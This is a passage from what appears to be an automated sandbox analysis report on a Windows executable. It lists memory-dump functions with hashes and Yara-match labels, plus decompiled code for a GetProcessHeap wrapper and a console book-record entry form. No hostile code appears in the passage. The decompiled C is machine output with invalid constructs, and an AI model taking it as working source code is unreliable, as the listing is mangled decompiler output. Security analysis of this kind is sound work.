                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 34327370bafa615fbb3280e6d65b654feea8f2420afa1a8f639ccef9dd2abf64
                                                  • Instruction ID: 5babb6a8244e313c4b50c751af7bb0680be1e95dc8f6b697b843d7d2d7a05f14
                                                  • Opcode Fuzzy Hash: 34327370bafa615fbb3280e6d65b654feea8f2420afa1a8f639ccef9dd2abf64
                                                  • Instruction Fuzzy Hash: A06159716403C896EA38AF6B88A5FBF73A4EB45340F54051AE5C3DB293D6E1DDC18391
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AE012A, Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 8bbef6d671a785d6f21c9d03c1f50587d23de78b9e475a7b4928a9d156d8f08b
                                                  • Instruction ID: 2f7461561969508d19960e4713a511a5f8a4f8fb55c827984c21c94176422980
                                                  • Opcode Fuzzy Hash: 8bbef6d671a785d6f21c9d03c1f50587d23de78b9e475a7b4928a9d156d8f08b
                                                  • Instruction Fuzzy Hash: C95178716007C56BDB3487AB8959FFF67E99B52300F18071ADB82CF282D6D09EC58362
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00ADFA9C, Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 3b9af54e8b3a50262255b5d1659744f4d8584bab0d0b9da596dfa6be030aad14
                                                  • Instruction ID: 56a9b87f15dde679d0fd71220f6ba8b5c247fb425ec55c693404745e2bf90baa
                                                  • Opcode Fuzzy Hash: 3b9af54e8b3a50262255b5d1659744f4d8584bab0d0b9da596dfa6be030aad14
                                                  • Instruction Fuzzy Hash: 52515A71700A895EDB348B28CA697FF77A9AF41340F18493BE94BCB392C654DE46C352
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004067FE, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004067FE() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x4132b0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                  0x004067fe
                                                  0x00406806
                                                  0x0040680e

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                                                  • Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
                                                  • Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                                                  • Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AEA20A, Relevance: .5, Instructions: 473COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a755384dc42aba6c5b2aeb24e4f997eb9146efbe9daa9ac9e59d3ae6ebdd8924
                                                  • Instruction ID: 3f515ef19d08add863a13f5e147750088be7c3ae89c43d5209b47e6bad62cfbf
                                                  • Opcode Fuzzy Hash: a755384dc42aba6c5b2aeb24e4f997eb9146efbe9daa9ac9e59d3ae6ebdd8924
                                                  • Instruction Fuzzy Hash: 83027471A002659FDF25CF19CC807AAB7F9BF56300F4540EAE949EB245D770AE818F92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B1526F, Relevance: .3, Instructions: 341COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction ID: 6cb4610d7445d1dbf3cc604513a51e323b16135a56ce3b6b8a2831f9b88e6e45
                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction Fuzzy Hash: A0C17D322055934ADB2D463EC4741BEBEE19AA27B135A07EDD8F3CB1C4EF20C5A5D620
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B14A05, Relevance: .3, Instructions: 331COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                  • Instruction ID: e0705d4ce3fec982063e79100af89a5519c6ac9fd2b7216027c3d9689c4208fd
                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                  • Instruction Fuzzy Hash: 0EC13D322091A30ADB2D467EC4741BFBAE1DAA27B535A07EDD4B3CB1D4EF10C5A5D620
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B145ED, Relevance: .3, Instructions: 323COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction ID: 8064fda01ca4018a5a8b3fe5bcf4dd8a727f208b84e37567ec46f67466241b75
                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction Fuzzy Hash: C8C13B3220519309DB2D467EC4741BFBEE19AA27B535A07EDD4B3CB1D4EF20C9A5D620
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AED8C0, Relevance: .3, Instructions: 294COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 221c7ffaab15e4397b3af6edecb3ea3149185e4043b1aa1e4cd42575d0e90220
                                                  • Instruction ID: abeefd1faafd7580b5e738b6ab7c33b4a54b3a11102b11382f206259bace07b1
                                                  • Opcode Fuzzy Hash: 221c7ffaab15e4397b3af6edecb3ea3149185e4043b1aa1e4cd42575d0e90220
                                                  • Instruction Fuzzy Hash: 06B16D71A002599FDB24DF1AD891BEDB3F5FB88354F2544AED849A7241E7709E818F80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF6662, Relevance: .0, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf42a61d4c6a496a1a38d94952de6cd8b55b87fa4c23b3dfef808954bede01a9
                                                  • Instruction ID: 15635fdc793b44c4b4afb885d5aa8647e2b51359988e1315bb064000d8e8dc1c
                                                  • Opcode Fuzzy Hash: bf42a61d4c6a496a1a38d94952de6cd8b55b87fa4c23b3dfef808954bede01a9
                                                  • Instruction Fuzzy Hash: 49F0627265522CABCA699BDCD619B7973A8E705710F110196F704D7250C9B1DE4097C4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF6492, Relevance: .0, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: df6dd2ca9809136a10fc038e7d08751d1147479b715406a6f8d75b976d96137c
                                                  • Instruction ID: 580b8189a82fd327a66565646392f96988426fe89608d4801df81a43580204ee
                                                  • Opcode Fuzzy Hash: df6dd2ca9809136a10fc038e7d08751d1147479b715406a6f8d75b976d96137c
                                                  • Instruction Fuzzy Hash: 91F06D3168420CABC725EFACC759B35B3E8E705745F1040A6F709C7650DA30DE418644
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF65A5, Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e522b5288dc90c878370de54e08fe97eed29412d3a4b7b159cac913686a34c85
                                                  • Instruction ID: ce48351546c97d47c9803c538b7cb92aeda64a6388bf88c04c9d98442a7b70d5
                                                  • Opcode Fuzzy Hash: e522b5288dc90c878370de54e08fe97eed29412d3a4b7b159cac913686a34c85
                                                  • Instruction Fuzzy Hash: 2BF03732A55338AFCB25DB8CD905B6973ACEB05711F014096F504DB250CA70DD40C7C0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF65EA, Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 501afe14e038b264f66ef7ae5b403b81e66e369edad855f45ea9d684afe65659
                                                  • Instruction ID: b15cd7b7bb80107e8f2dce556e56c00cdc2b1204933d0434f1587333eeb74992
                                                  • Opcode Fuzzy Hash: 501afe14e038b264f66ef7ae5b403b81e66e369edad855f45ea9d684afe65659
                                                  • Instruction Fuzzy Hash: DFF06572A55228EFCB26CB8CD905B69B3FCEB04B50F114097FA04D7251CAB49D40C7C0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF640A, Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f5ab4a39da46a6765af172c9f447248e53566fe0900eb0d47425f5fa1b653a9
                                                  • Instruction ID: db288631ffcaf3116e3983e380350e8f9b0a3a99905f7a9a2c3150d17295d825
                                                  • Opcode Fuzzy Hash: 2f5ab4a39da46a6765af172c9f447248e53566fe0900eb0d47425f5fa1b653a9
                                                  • Instruction Fuzzy Hash: FEF06D31605348EFCB15DFA9DA44F59B3E8EB44345F1080A9F908C7210EB34DE80CB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF644E, Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88625ccc06c2eb69af8b7926c71020692a6d5910490d2449a383d5b2e3dece2b
                                                  • Instruction ID: 5b9adb8fe0a1cf42f36aa2ef638cc189ef36d482015132b11431a9e0627b47e6
                                                  • Opcode Fuzzy Hash: 88625ccc06c2eb69af8b7926c71020692a6d5910490d2449a383d5b2e3dece2b
                                                  • Instruction Fuzzy Hash: FFF06D31605308EFCB15CFA8D645B59B7F8EB48395F1080A9F908C7650DA34DE41CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF662F, Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c8b28fa06a22fff8c293cf0322283e97189e0f4748b015043632405c200f20e3
                                                  • Instruction ID: c00de00c67fe9407726666a47af4f6e3044ea2334ebce50846ce7123254dc139
                                                  • Opcode Fuzzy Hash: c8b28fa06a22fff8c293cf0322283e97189e0f4748b015043632405c200f20e3
                                                  • Instruction Fuzzy Hash: FEE0463291222CEBC728DBCC8A05AAAF3ACEB09B10B11459ABA08D3601C6709E01C7D0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF64EE, Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 37ad7ea4727f9ba49799d53aaabb54e649a0d9a553b737658c65bdf83f8bec10
                                                  • Instruction ID: 60822bdc93c7afd9313f40e0892e9edd75262c9cbdede4df52c7c8e471569f31
                                                  • Opcode Fuzzy Hash: 37ad7ea4727f9ba49799d53aaabb54e649a0d9a553b737658c65bdf83f8bec10
                                                  • Instruction Fuzzy Hash: A9E08C3150120CEFC700DF94C648A49B7F8EB44310F1144A4F809C3200D634DF80DA40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AD90B9, Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9da65c86127557b53dffe244b71f1471860e912be3e0ebc7287fc9cd5e280ba0
                                                  • Instruction ID: b5972c289cf738cbdd4808e17bd137d3a7df00d0904f25fb66198ce135025681
                                                  • Opcode Fuzzy Hash: 9da65c86127557b53dffe244b71f1471860e912be3e0ebc7287fc9cd5e280ba0
                                                  • Instruction Fuzzy Hash: 2EC09B355615484ACF61D734D25155973D4F391781FC018C5E001C7A12C51DDC45D511
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B18050, Relevance: 126.3, APIs: 64, Strings: 8, Instructions: 330COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 81%
                                                  			E00B18050(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t70;
				void* _t109;
				signed int _t113;
				void* _t117;
				void* _t118;
				void* _t122;
				void* _t159;

				_t159 = __eflags;
				_t117 = __edx;
				_t112 = __ecx;
				0xb27e6c->X = 0x30014;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112, "Enter the Information Below", _t118);
				0xb27e6c->X = 0x40014;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112, 0xb23478, _t122);
				0xb27e6c->X = 0x50014;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112, 0xb22e3c, _t109);
				0xb27e6c->X = 0x5002e;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112, 0xb22e3c, __ecx);
				0xb27e6c->X = 0x60014;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112);
				0xb27e6c->X = 0x6002e;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112, 0xb22e3c, 0xb22e3c);
				0xb27e6c->X = 0x70014;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112);
				0xb27e6c->X = 0x7002e;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112, 0xb22e3c, 0xb22e3c);
				0xb27e6c->X = 0x80014;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112);
				0xb27e6c->X = 0x8002e;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112, 0xb22e3c, 0xb22e3c);
				0xb27e6c->X = 0x90014;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112);
				0xb27e6c->X = 0x9002e;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112, 0xb22e3c, 0xb22e3c);
				0xb27e6c->X = 0xa0014;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112);
				0xb27e6c->X = 0xa002e;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112, 0xb22e3c, 0xb22e3c);
				0xb27e6c->X = 0xb0014;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112);
				0xb27e6c->X = 0xb002e;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112, 0xb22e3c, 0xb22e3c);
				0xb27e6c->X = 0xc0014;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112);
				0xb27e6c->X = 0x50015;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t112, "Category:", 0xb23478);
				0xb27e6c->X = 0x5001f;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				_t113 =  *0xb27f30; // 0x0
				_t1 = (_t113 << 4) -  *0xb27f30 + 0xb26941; // -5615
				E00AD1080((_t113 << 4) -  *0xb27f30, "%s", _t1);
				0xb27e6c->X = 0x60015;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				_push("Book ID:\t");
				E00AD1080((_t113 << 4) -  *0xb27f30);
				0xb27e6c->X = 0x6001e;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD10F0((_t113 << 4) -  *0xb27f30, 0xb22be0,  &_v8);
				_t116 = _v8;
				_t70 = L00B17FF0(_v8, _t117, _t159);
				_t160 = _t70;
				if(_t70 != 0) {
					0xb27e6c->X = 0x70015;
					 *0xb27ec0 = _v8;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t116);
					0xb27e6c->X = 0x70021;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD10F0(_t116, "%s", 0xb27ed8);
					0xb27e6c->X = 0x80015;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t116, "Author:", "Book Name:");
					0xb27e6c->X = 0x8001e;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD10F0(_t116, "%s", 0xb27eec);
					0xb27e6c->X = 0x90015;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t116);
					0xb27e6c->X = 0x9001f;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD10F0(_t116, 0xb22be0, 0xb27f00);
					0xb27e6c->X = 0xa0015;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t116, "Price:", "Quantity:");
					0xb27e6c->X = 0xa001c;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD10F0(_t116, "%f", 0xb27f04);
					0xb27e6c->X = 0xb0015;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					_push("Rack No:");
					E00AD1080(_t116);
					0xb27e6c->X = 0xb001e;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD10F0(_t116, 0xb22be0, 0xb27f0c);
					return 1;
				} else {
					0xb27e6c->X = 0xd0015;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
					_push(0xb234ac);
					E00AD1080(_t116);
					E00AF4817(_t117, GetStdHandle, _t160);
					E00B1A4D0(_t109, _t116, _t117, SetConsoleCursorPosition, GetStdHandle);
					return 0;
				}
			}















                                                  0x00b18050
                                                  0x00b18050
                                                  0x00b18050
                                                  0x00b1805d
                                                  0x00b18078
                                                  0x00b1807f
                                                  0x00b18087
                                                  0x00b1809c
                                                  0x00b180a3
                                                  0x00b180ab
                                                  0x00b180c0
                                                  0x00b180c7
                                                  0x00b180cf
                                                  0x00b180e4
                                                  0x00b180eb
                                                  0x00b180f3
                                                  0x00b18108
                                                  0x00b1810f
                                                  0x00b18117
                                                  0x00b1812c
                                                  0x00b18133
                                                  0x00b1813b
                                                  0x00b18150
                                                  0x00b18157
                                                  0x00b1815f
                                                  0x00b18174
                                                  0x00b1817b
                                                  0x00b18183
                                                  0x00b18198
                                                  0x00b1819f
                                                  0x00b181a7
                                                  0x00b181bc
                                                  0x00b181c3
                                                  0x00b181cb
                                                  0x00b181e0
                                                  0x00b181e7
                                                  0x00b181ef
                                                  0x00b18204
                                                  0x00b1820b
                                                  0x00b18213
                                                  0x00b18228
                                                  0x00b1822f
                                                  0x00b18237
                                                  0x00b1824c
                                                  0x00b18253
                                                  0x00b1825b
                                                  0x00b18270
                                                  0x00b18277
                                                  0x00b1827f
                                                  0x00b18294
                                                  0x00b1829b
                                                  0x00b182a3
                                                  0x00b182b8
                                                  0x00b182bf
                                                  0x00b182c7
                                                  0x00b182dc
                                                  0x00b182e3
                                                  0x00b182eb
                                                  0x00b18300
                                                  0x00b18302
                                                  0x00b18311
                                                  0x00b1831d
                                                  0x00b18325
                                                  0x00b1833a
                                                  0x00b1833c
                                                  0x00b18341
                                                  0x00b18349
                                                  0x00b1835e
                                                  0x00b18369
                                                  0x00b1836e
                                                  0x00b18374
